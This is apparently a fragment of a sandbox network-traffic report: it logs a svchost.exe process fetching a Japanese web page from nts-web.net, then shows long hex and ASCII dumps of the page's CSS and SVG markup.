                                                                                                                                                                                                                                                                          Data Ascii: 8 94.448 203.952 96.286 201.838 94.448 199.725" fill="#fff"/><polygon points="94.448 187.919 92.61 190.032 94.448 192.146 96.286 190.032 94.448 187.919" fill="#fff"/><polygon points="94.448 176.113 92.61 178.226 94.448 180.34 96.286 178.226 94.448 176.113


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          70192.168.2.6515849.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6418OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: nts-web.net
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6600INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:48 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 2599149
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT
                                                                                                                                                                                                                                                                          ETag: "27a8ed-5eceaf89b8f40"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6600INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6616INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                                                                                                                          Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6719INData Raw: 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 36 2c 31 38 38 2e 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34
                                                                                                                                                                                                                                                                          Data Ascii: 1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M692.6,188.1a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6735INData Raw: 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 31 32 2c 32 35 36 2e 34 38 61 31
                                                                                                                                                                                                                                                                          Data Ascii: 2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M723.12,256.48a1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6751INData Raw: 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,.51-2.89,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6882INData Raw: 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 36 34 2c 33 32 34 2e 38 36 61 31 2e 37 31 2c 31 2e 37 31
                                                                                                                                                                                                                                                                          Data Ascii: 24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M753.64,324.86a1.71,1.71
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6898INData Raw: 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 35 35 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M770.55,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6914INData Raw: 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                          Data Ascii: 34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7222INData Raw: 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70
                                                                                                                                                                                                                                                                          Data Ascii: 1,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><p
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7238INData Raw: 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37 35 2c 32 31 37 2e 35 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c
                                                                                                                                                                                                                                                                          Data Ascii: 73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.75,217.52a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7254INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7270INData Raw: 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 39 2e 37 39 2c 33 35 34 2e 32 38 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33
                                                                                                                                                                                                                                                                          Data Ascii: 2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M909.79,354.28a1.71,1.71,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7286INData Raw: 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 37 2c 32 32 38 2e 37 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: 9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M926.7,228.76a1.72,1.72,0,0,1-.78,2.24,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7302INData Raw: 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 33 34 2c 31 37 37 2e 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: 82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M1027.34,177.4a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7639INData Raw: 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 39 37 2e 35 31 2c 31 31 36 2e 38 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33
                                                                                                                                                                                                                                                                          Data Ascii: -.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M997.51,116.88a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7655INData Raw: 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31
                                                                                                                                                                                                                                                                          Data Ascii: .37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M981
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7671INData Raw: 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 34 39 2c 31 39 33 2e 36 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M951.49,193.64a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.
